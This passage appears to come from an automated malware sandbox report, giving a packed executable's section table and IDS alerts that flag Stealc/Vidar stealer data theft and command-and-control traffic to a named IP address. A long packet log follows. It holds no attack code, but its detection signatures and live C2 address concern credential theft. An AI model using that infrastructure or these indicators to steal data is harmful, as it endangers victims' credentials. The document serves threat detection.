                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          0x10000x260000xec007f989802d7e7d6b457ced4c3233180fdFalse0.9982289459745762data7.97802160630939IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .rsrc0x270000x40c0x400f9f43cdd41618b54301677af7d36dbcfFalse0.4853515625data4.186032850312854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .idata 0x280000x10000x200299e32f9c8f003ccfc3eeaceaa2dbd9bFalse0.150390625data1.0253754142196863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          0x290000x2ad0000x200fae5c1c480b358846f8f1ff0c3e6c9e0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          xyhrtgkn0x2d60000x1ab0000x1aa400f473938a3584b8522505cb31225eb071False0.9948176319648094data7.955289387133198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          atwyfmcm0x4810000x10000x6001256cb851b004524a5e2185195d72a00False0.5384114583333334data4.855743039337339IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .taggant0x4820000x30000x22002a9a8e0f340a1b86b6baafb395eadb7aFalse0.06020220588235294DOS executable (COM)0.782857907341733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_MANIFEST0x47fe840x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                          RT_MANIFEST0x4800da0x143XML 1.0 document, ASCII textEnglishUnited States0.628482972136223
                                                                                                                                          DLLImport
                                                                                                                                          kernel32.dlllstrcpy
                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishUnited States

                                                                                                                                          Download Network PCAP: filteredfull

                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2025-03-19T14:00:14.506040+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.104968378.47.63.132443TCP
                                                                                                                                          2025-03-19T14:00:17.957230+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config178.47.63.132443192.168.2.1049685TCP
                                                                                                                                          2025-03-19T14:00:20.590290+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.104968678.47.63.132443TCP
                                                                                                                                          2025-03-19T14:00:20.590469+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1178.47.63.132443192.168.2.1049686TCP
                                                                                                                                          2025-03-19T14:00:28.067428+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.104969478.47.63.132443TCP
                                                                                                                                          2025-03-19T14:02:16.338105+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.104969978.47.63.132443TCP
                                                                                                                                          2025-03-19T14:02:16.739083+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.104970078.47.63.132443TCP
                                                                                                                                          2025-03-19T14:02:16.739083+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.104970078.47.63.132443TCP
                                                                                                                                          2025-03-19T14:02:17.804395+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.104970178.47.63.132443TCP
                                                                                                                                          2025-03-19T14:02:17.804395+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.104970178.47.63.132443TCP
                                                                                                                                          2025-03-19T14:02:19.840485+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.104970278.47.63.132443TCP
                                                                                                                                          2025-03-19T14:02:19.840485+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.104970278.47.63.132443TCP
                                                                                                                                          • Total Packets: 231
                                                                                                                                          • 443 (HTTPS)
                                                                                                                                          • 53 (DNS)
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Mar 19, 2025 14:00:10.099358082 CET49681443192.168.2.10149.154.167.99
                                                                                                                                          Mar 19, 2025 14:00:10.099421024 CET44349681149.154.167.99192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:10.099515915 CET49681443192.168.2.10149.154.167.99
                                                                                                                                          Mar 19, 2025 14:00:10.109301090 CET49681443192.168.2.10149.154.167.99
                                                                                                                                          Mar 19, 2025 14:00:10.109318972 CET44349681149.154.167.99192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:10.796212912 CET44349681149.154.167.99192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:10.796344995 CET49681443192.168.2.10149.154.167.99
                                                                                                                                          Mar 19, 2025 14:00:10.869992971 CET49681443192.168.2.10149.154.167.99
                                                                                                                                          Mar 19, 2025 14:00:10.870021105 CET44349681149.154.167.99192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:10.870282888 CET44349681149.154.167.99192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:10.870340109 CET49681443192.168.2.10149.154.167.99
                                                                                                                                          Mar 19, 2025 14:00:10.873047113 CET49681443192.168.2.10149.154.167.99
                                                                                                                                          Mar 19, 2025 14:00:10.920317888 CET44349681149.154.167.99192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:11.071620941 CET44349681149.154.167.99192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:11.071645975 CET44349681149.154.167.99192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:11.071681976 CET44349681149.154.167.99192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:11.071686029 CET49681443192.168.2.10149.154.167.99
                                                                                                                                          Mar 19, 2025 14:00:11.071696043 CET44349681149.154.167.99192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:11.071718931 CET49681443192.168.2.10149.154.167.99
                                                                                                                                          Mar 19, 2025 14:00:11.071783066 CET49681443192.168.2.10149.154.167.99
                                                                                                                                          Mar 19, 2025 14:00:11.424648046 CET49681443192.168.2.10149.154.167.99
                                                                                                                                          Mar 19, 2025 14:00:11.424669981 CET44349681149.154.167.99192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:11.687314034 CET49682443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:11.687354088 CET4434968278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:11.687433004 CET49682443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:11.687849998 CET49682443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:11.687861919 CET4434968278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:12.612648964 CET4434968278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:12.612734079 CET49682443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:12.618560076 CET49682443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:12.618570089 CET4434968278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:12.618809938 CET4434968278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:12.618870974 CET49682443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:12.619247913 CET49682443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:12.664335012 CET4434968278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:13.081408978 CET4434968278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:13.081531048 CET4434968278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:13.081629992 CET49682443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:13.081700087 CET49682443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:13.084687948 CET49682443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:13.084707022 CET4434968278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:13.120435953 CET49683443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:13.120542049 CET4434968378.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:13.120696068 CET49683443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:13.121027946 CET49683443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:13.121067047 CET4434968378.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:13.829075098 CET4434968378.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:13.829190016 CET49683443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:13.829899073 CET49683443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:13.829927921 CET4434968378.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:13.831852913 CET49683443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:13.831867933 CET4434968378.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:14.506078005 CET4434968378.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:14.506171942 CET4434968378.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:14.506354094 CET49683443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:14.506355047 CET49683443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:14.506700039 CET49683443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:14.506741047 CET4434968378.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:14.563390017 CET49684443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:14.563497066 CET4434968478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:14.563599110 CET49684443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:14.563896894 CET49684443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:14.563930988 CET4434968478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:15.290113926 CET4434968478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:15.290301085 CET49684443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:15.291327953 CET49684443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:15.291341066 CET4434968478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:15.293992043 CET49684443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:15.293998003 CET4434968478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:15.991796017 CET4434968478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:15.991827011 CET4434968478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:15.991869926 CET49684443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:15.991899014 CET4434968478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:15.991902113 CET49684443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:15.991957903 CET49684443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:16.470128059 CET49684443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:16.470165968 CET4434968478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:16.588824987 CET49685443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:16.588881969 CET4434968578.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:16.588968039 CET49685443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:16.596230984 CET49685443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:16.596244097 CET4434968578.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:17.288151979 CET4434968578.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:17.288377047 CET49685443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:17.289541960 CET49685443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:17.289556026 CET4434968578.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:17.291404009 CET49685443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:17.291409969 CET4434968578.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:17.956981897 CET4434968578.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:17.957003117 CET4434968578.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:17.957093000 CET4434968578.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:17.957107067 CET49685443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:17.957182884 CET49685443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:17.957182884 CET49685443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:18.733110905 CET49685443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:18.733150005 CET4434968578.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:19.307059050 CET49686443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:19.307126045 CET4434968678.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:19.307209969 CET49686443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:19.339025021 CET49686443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:19.339060068 CET4434968678.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:20.047383070 CET4434968678.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:20.047477007 CET49686443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:20.048310041 CET49686443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:20.048317909 CET4434968678.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:20.050255060 CET49686443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:20.050261021 CET4434968678.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:20.590301991 CET4434968678.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:20.590373993 CET4434968678.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:20.590404034 CET49686443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:20.590440035 CET49686443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:20.590923071 CET49686443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:20.590943098 CET4434968678.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:26.734472036 CET49694443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:26.734527111 CET4434969478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:26.734611988 CET49694443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:26.735274076 CET49694443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:26.735290051 CET4434969478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:27.436851025 CET4434969478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:27.436913967 CET49694443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:27.437551975 CET49694443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:27.437587976 CET4434969478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:27.447753906 CET49694443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:27.447782040 CET4434969478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:27.447822094 CET49694443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:27.447837114 CET4434969478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:28.067459106 CET4434969478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:28.067548037 CET4434969478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:28.067564011 CET49694443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:28.067670107 CET49694443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:28.068728924 CET49694443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:28.068758965 CET4434969478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:14.846384048 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:14.846441031 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:14.847249031 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:14.847249031 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:14.847284079 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:15.584636927 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:15.586486101 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:15.621989965 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:15.622014046 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:15.639235973 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:15.639260054 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.031196117 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.031250000 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.031323910 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.031881094 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.031893015 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.338114977 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.338272095 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.338288069 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.338345051 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.338500977 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.338566065 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.342381001 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.342381001 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.342381001 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.735090971 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.735236883 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.736174107 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.736181974 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738305092 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738325119 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738393068 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738404036 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738416910 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738430977 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738490105 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738504887 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738513947 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738528013 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738559961 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738578081 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738615990 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738631010 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738658905 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738672972 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738729954 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738750935 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738761902 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738775015 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738802910 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738815069 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738858938 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738873959 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738941908 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738956928 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739028931 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739046097 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739069939 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739082098 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739090919 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739104986 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739124060 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739131927 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739214897 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739224911 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739247084 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739265919 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739280939 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739284992 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.780392885 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.780426979 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.023544073 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.023598909 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.023744106 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.024385929 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.024405003 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.799406052 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.801486969 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.802061081 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.802071095 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.803971052 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.803980112 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804115057 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804132938 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804138899 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804152966 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804177046 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804182053 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804245949 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804264069 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804323912 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804332972 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804354906 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804368973 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.183022022 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.183073044 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.183083057 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.183101892 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.183144093 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.183144093 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.184343100 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.184359074 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.796875000 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.796950102 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.797044992 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.797044992 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.807503939 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.807528019 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.118402958 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.118470907 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.122572899 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.126403093 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.126435041 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.837347031 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.837749958 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.838099003 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.838112116 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.839989901 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840006113 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840065956 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840080023 CET4434970278.47.63.132192.168.2.10
